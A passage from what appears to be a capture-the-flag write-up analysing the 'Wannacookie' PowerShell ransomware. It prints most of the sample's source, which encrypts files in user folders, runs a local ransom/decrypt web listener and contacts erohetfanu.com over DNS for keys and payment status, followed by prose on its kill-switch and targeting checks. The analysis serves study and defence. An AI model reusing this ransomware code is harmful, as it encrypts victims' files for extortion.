    &lt;span class="nv"&gt;$c_id&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;snd_k&lt;/span&gt; &lt;span class="nv"&gt;$p_k_e_k&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="nv"&gt;$d_t&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(($(&lt;/span&gt;&lt;span class="nb"&gt;Get-Date&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="n"&gt;ToUniversalTime&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; &lt;span class="nb"&gt;Out-String&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;-replace&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;&lt;/span&gt;&lt;span class="se"&gt;`r`n&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="no"&gt;[array]&lt;/span&gt;&lt;span class="nv"&gt;$f_c&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="p"&gt;$(&lt;/span&gt;&lt;span class="nb"&gt;Get-ChildItem&lt;/span&gt; &lt;span class="p"&gt;*.&lt;/span&gt;&lt;span class="n"&gt;elfdb&lt;/span&gt; &lt;span class="n"&gt;-Exclude&lt;/span&gt; &lt;span class="p"&gt;*.&lt;/span&gt;&lt;span class="n"&gt;wannacookie&lt;/span&gt; &lt;span class="n"&gt;-Path&lt;/span&gt; &lt;span class="p"&gt;$($(&lt;/span&gt;&lt;span class="nv"&gt;$env:userprofile&lt;/span&gt;&lt;span class="p"&gt;+&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;\Desktop&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;),$(&lt;/span&gt;&lt;span class="nv"&gt;$env:userprofile&lt;/span&gt;&lt;span class="p"&gt;+&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;\Documents&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;),$(&lt;/span&gt;&lt;span class="nv"&gt;$env:userprofile&lt;/span&gt;&lt;span class="p"&gt;+&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;\Videos&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;),$(&lt;/span&gt;&lt;span class="nv"&gt;$env:userprofile&lt;/span&gt;&lt;span class="p"&gt;+&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;\Pictures&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;),$(&lt;/span&gt;&lt;span class="nv"&gt;$env:userprofile&lt;/span&gt;&lt;span class="p"&gt;+&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;\Music&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt; &lt;span class="n"&gt;-Recurse&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; &lt;span class="nb"&gt;where &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="p"&gt;!&lt;/span&gt; &lt;span class="nv"&gt;$_&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;PSIsContainer&lt;/span&gt;
            &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; &lt;span class="k"&gt;Foreach&lt;/span&gt;&lt;span class="n"&gt;-Object&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="nv"&gt;$_&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Fullname&lt;/span&gt;
            &lt;span class="p"&gt;});&lt;/span&gt;
    &lt;span class="n"&gt;e_n_d&lt;/span&gt; &lt;span class="nv"&gt;$b_k&lt;/span&gt; &lt;span class="nv"&gt;$f_c&lt;/span&gt; &lt;span class="nv"&gt;$true&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="nb"&gt;Clear-variable&lt;/span&gt; &lt;span class="n"&gt;-Name&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;h_k&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="nb"&gt;Clear-variable&lt;/span&gt; &lt;span class="n"&gt;-Name&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;b_k&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="nv"&gt;$lurl&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;http://127.0.0.1:8080/&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="nv"&gt;$html_c&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="p"&gt;@{&lt;/span&gt;
        &lt;span class="s1"&gt;&amp;#39;GET /&amp;#39;&lt;/span&gt;  &lt;span class="p"&gt;=&lt;/span&gt;  &lt;span class="p"&gt;$(&lt;/span&gt;&lt;span class="n"&gt;g_o_dns&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;A2H&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;source.min.html&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;));&lt;/span&gt;
        &lt;span class="s1"&gt;&amp;#39;GET /close&amp;#39;&lt;/span&gt;  &lt;span class="p"&gt;=&lt;/span&gt;  &lt;span class="s1"&gt;&amp;#39;&amp;lt;p&amp;gt;Bye!&amp;lt;/p&amp;gt;&amp;#39;&lt;/span&gt;
    &lt;span class="p"&gt;};&lt;/span&gt;
    &lt;span class="nb"&gt;Start-Job&lt;/span&gt; &lt;span class="n"&gt;-ScriptBlock&lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;param&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$url&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="nb"&gt;Start-Sleep&lt;/span&gt; &lt;span class="n"&gt;10&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="nb"&gt;Add-type&lt;/span&gt; &lt;span class="n"&gt;-AssemblyName&lt;/span&gt; &lt;span class="n"&gt;System&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Windows&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Forms&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="nb"&gt;start-process&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;$url&amp;quot;&lt;/span&gt; &lt;span class="n"&gt;-WindowStyle&lt;/span&gt; &lt;span class="n"&gt;Maximized&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="nb"&gt;Start-sleep&lt;/span&gt; &lt;span class="n"&gt;2&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="no"&gt;[System.Windows.Forms.SendKeys]&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="n"&gt;SendWait&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;{F11}&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="n"&gt;-Arg&lt;/span&gt; &lt;span class="nv"&gt;$lurl&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="nv"&gt;$list&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;New-Object&lt;/span&gt; &lt;span class="n"&gt;System&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Net&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;HttpListener&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="nv"&gt;$list&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Prefixes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Add&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$lurl&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="nv"&gt;$list&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Start&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
    &lt;span class="k"&gt;try&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="nv"&gt;$close&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$false&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="k"&gt;while&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$list&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;IsListening&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="nv"&gt;$context&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$list&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;GetContext&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
            &lt;span class="nv"&gt;$Req&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$context&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Request&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="nv"&gt;$Resp&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$context&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Response&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="nv"&gt;$recvd&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;{0} {1}&amp;#39;&lt;/span&gt; &lt;span class="o"&gt;-f&lt;/span&gt; &lt;span class="nv"&gt;$Req&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;httpmethod&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;$Req&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;url&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;localpath&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$recvd&lt;/span&gt; &lt;span class="o"&gt;-eq&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;GET /&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
                &lt;span class="nv"&gt;$html&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$html_c&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nv"&gt;$recvd&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
            &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;elseif&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$recvd&lt;/span&gt; &lt;span class="o"&gt;-eq&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;GET /decrypt&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
                &lt;span class="nv"&gt;$akey&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$Req&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;QueryString&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Item&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;key&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
                &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$k_h&lt;/span&gt; &lt;span class="o"&gt;-eq&lt;/span&gt; &lt;span class="p"&gt;$(&lt;/span&gt;&lt;span class="n"&gt;sh1&lt;/span&gt; &lt;span class="nv"&gt;$akey&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
                    &lt;span class="nv"&gt;$akey&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="p"&gt;$(&lt;/span&gt;&lt;span class="n"&gt;H2B&lt;/span&gt; &lt;span class="nv"&gt;$akey&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
                    &lt;span class="no"&gt;[array]&lt;/span&gt;&lt;span class="nv"&gt;$f_c&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="p"&gt;$(&lt;/span&gt;&lt;span class="nb"&gt;Get-ChildItem&lt;/span&gt; &lt;span class="n"&gt;-Path&lt;/span&gt; &lt;span class="p"&gt;$(&lt;/span&gt;&lt;span class="nv"&gt;$env:userprofile&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="n"&gt;-Recurse&lt;/span&gt;  &lt;span class="n"&gt;-Filter&lt;/span&gt; &lt;span class="p"&gt;*.&lt;/span&gt;&lt;span class="n"&gt;wannacookie&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; &lt;span class="nb"&gt;where &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;
                            &lt;span class="p"&gt;!&lt;/span&gt; &lt;span class="nv"&gt;$_&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;PSIsContainer&lt;/span&gt;
                            &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; &lt;span class="k"&gt;Foreach&lt;/span&gt;&lt;span class="n"&gt;-Object&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
                            &lt;span class="nv"&gt;$_&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Fullname&lt;/span&gt;
                            &lt;span class="p"&gt;});&lt;/span&gt;
                    &lt;span class="n"&gt;e_n_d&lt;/span&gt; &lt;span class="nv"&gt;$akey&lt;/span&gt; &lt;span class="nv"&gt;$f_c&lt;/span&gt; &lt;span class="nv"&gt;$false&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
                    &lt;span class="nv"&gt;$html&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;Files have been decrypted!&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
                    &lt;span class="nv"&gt;$close&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$true&lt;/span&gt;
                &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
                    &lt;span class="nv"&gt;$html&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;Invalid Key!&amp;quot;&lt;/span&gt;
                &lt;span class="p"&gt;}&lt;/span&gt;
            &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;elseif&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$recvd&lt;/span&gt; &lt;span class="o"&gt;-eq&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;GET /close&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
                &lt;span class="nv"&gt;$close&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$true&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
                &lt;span class="nv"&gt;$html&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$html_c&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nv"&gt;$recvd&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
            &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;elseif&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$recvd&lt;/span&gt; &lt;span class="o"&gt;-eq&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;GET /cookie_is_paid&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
                &lt;span class="nv"&gt;$c_n_k&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="p"&gt;$(&lt;/span&gt;&lt;span class="nb"&gt;Resolve-DnsName&lt;/span&gt; &lt;span class="n"&gt;-Server&lt;/span&gt; &lt;span class="n"&gt;erohetfanu&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;com&lt;/span&gt; &lt;span class="n"&gt;-Name&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;$c_id.72616e736f6d697370616964.erohetfanu.com&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;trim&lt;/span&gt;&lt;span class="p"&gt;())&lt;/span&gt; &lt;span class="n"&gt;-Type&lt;/span&gt; &lt;span class="n"&gt;TXT&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="n"&gt;Strings&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
                &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt; &lt;span class="nv"&gt;$c_n_k&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;length&lt;/span&gt; &lt;span class="o"&gt;-eq&lt;/span&gt; &lt;span class="n"&gt;32&lt;/span&gt; &lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
                    &lt;span class="nv"&gt;$html&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$c_n_k&lt;/span&gt;
                &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
                    &lt;span class="nv"&gt;$html&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;UNPAID|$c_id|$d_t&amp;quot;&lt;/span&gt;
                &lt;span class="p"&gt;}&lt;/span&gt;
            &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
                &lt;span class="nv"&gt;$Resp&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;statuscode&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="n"&gt;404&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
                &lt;span class="nv"&gt;$html&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;&amp;lt;h1&amp;gt;404 Not Found&amp;lt;/h1&amp;gt;&amp;#39;&lt;/span&gt;
            &lt;span class="p"&gt;};&lt;/span&gt;
            &lt;span class="nv"&gt;$buffer&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="no"&gt;[Text.Encoding]&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="n"&gt;UTF8&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;GetBytes&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$html&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="nv"&gt;$Resp&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;ContentLength64&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$buffer&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;length&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="nv"&gt;$Resp&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;OutputStream&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Write&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$buffer&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;$buffer&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;length&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="nv"&gt;$Resp&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Close&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$close&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
                &lt;span class="nv"&gt;$list&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Stop&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
                &lt;span class="k"&gt;return&lt;/span&gt;
            &lt;span class="p"&gt;}&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;finally&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="nv"&gt;$list&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Stop&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;};&lt;/span&gt;
&lt;span class="n"&gt;wanc&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Whew, that's a lot of script. We'll analyze it more deeply in the next
question. The script defines many functions. The main one seems to be
&lt;code&gt;wanc&lt;/code&gt;, since it's called at the end of the script. Let's take a look at
the beginning of this function:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="k"&gt;function&lt;/span&gt; &lt;span class="n"&gt;wanc&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="nv"&gt;$S1&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;1f8b080000000000040093e76762129765e2e1e6640f6361e7e202000cdd5c5c10000000&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="hll"&gt;    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$null&lt;/span&gt; &lt;span class="o"&gt;-ne&lt;/span&gt; &lt;span class="p"&gt;((&lt;/span&gt;&lt;span class="nb"&gt;Resolve-DnsName&lt;/span&gt; &lt;span class="n"&gt;-Name&lt;/span&gt; &lt;span class="p"&gt;$(&lt;/span&gt;&lt;span class="n"&gt;H2A&lt;/span&gt; &lt;span class="p"&gt;$(&lt;/span&gt;&lt;span class="n"&gt;B2H&lt;/span&gt; &lt;span class="p"&gt;$(&lt;/span&gt;&lt;span class="n"&gt;ti_rox&lt;/span&gt; &lt;span class="p"&gt;$(&lt;/span&gt;&lt;span class="n"&gt;B2H&lt;/span&gt; &lt;span class="p"&gt;$(&lt;/span&gt;&lt;span class="n"&gt;G2B&lt;/span&gt; &lt;span class="p"&gt;$(&lt;/span&gt;&lt;span class="n"&gt;H2B&lt;/span&gt; &lt;span class="nv"&gt;$S1&lt;/span&gt;&lt;span class="p"&gt;)))&lt;/span&gt; &lt;span class="p"&gt;$(&lt;/span&gt;&lt;span class="nb"&gt;Resolve-DnsName&lt;/span&gt; &lt;span class="n"&gt;-Server&lt;/span&gt; &lt;span class="n"&gt;erohetfanu&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;com&lt;/span&gt; &lt;span class="n"&gt;-Name&lt;/span&gt; &lt;span class="n"&gt;6B696C6C737769746368&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;erohetfanu&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;com&lt;/span&gt; &lt;span class="n"&gt;-Type&lt;/span&gt; &lt;span class="n"&gt;TXT&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="n"&gt;Strings&lt;/span&gt;&lt;span class="p"&gt;))).&lt;/span&gt;&lt;span class="n"&gt;ToString&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="n"&gt;-ErrorAction&lt;/span&gt; &lt;span class="n"&gt;0&lt;/span&gt; &lt;span class="n"&gt;-Server&lt;/span&gt; &lt;span class="n"&gt;8&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;8&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;8&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;8&lt;/span&gt;&lt;span class="p"&gt;)))&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
&lt;/span&gt;        &lt;span class="k"&gt;return&lt;/span&gt;
    &lt;span class="p"&gt;};&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;($(&lt;/span&gt;&lt;span class="n"&gt;netstat&lt;/span&gt; &lt;span class="n"&gt;-ano&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; &lt;span class="nb"&gt;Select-String&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;127.0.0.1:8080&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="n"&gt;length&lt;/span&gt; &lt;span class="o"&gt;-ne&lt;/span&gt; &lt;span class="n"&gt;0&lt;/span&gt; &lt;span class="o"&gt;-or&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nb"&gt;Get-WmiObject&lt;/span&gt; &lt;span class="n"&gt;Win32_ComputerSystem&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="n"&gt;Domain&lt;/span&gt; &lt;span class="o"&gt;-ne&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;KRINGLECASTLE&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt;
    &lt;span class="p"&gt;};&lt;/span&gt;
&lt;span class="no"&gt;[snip]&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The function begins by making some kind of DNS request. If it resolves, then
it immediatly returns. It also checks if something is listening on
&lt;code&gt;127.0.0.1:8080&lt;/code&gt; (&lt;em&gt;i.e.&lt;/em&gt; if the ransomware is already running), and if
the Active Directory domain of the infected machine is &lt;code&gt;KRINGLECASTLE&lt;/code&gt;:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;The first check (the DNS check) is used to make sure that the ransomware is
not being ran in a virtual machine. This check is similar to what
&lt;a class="reference external" href="https://twitter.com/MalwareTechBlog"&gt;&amp;#64;MalwareTechBlog&lt;/a&gt; found in the
WannaCry ransomware.&lt;/li&gt;
&lt;li&gt;The second check (the network check and the Active Directory check) is to
make sure that the ransomware is running on the intended target, and is not
being ran more than once.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Similarly to WannaCry, if we register the killswitch domain, then it will
always resolved and the ransomware will stop working. To find the kill switch
domain, let's just execute the PowerShell code used to generate it. To run
this command, the variable &lt;code&gt;S1&lt;/code&gt; and the functions &lt;code&gt;H2A&lt;/code&gt;,
&lt;code&gt;B2H&lt;/code&gt;, &lt;code&gt;H2B&lt;/code&gt;, &lt;code&gt;G2B&lt;/code&gt;, and &lt;code&gt;ti_rox&lt;/code&gt; must be defined:&lt;/p&gt;
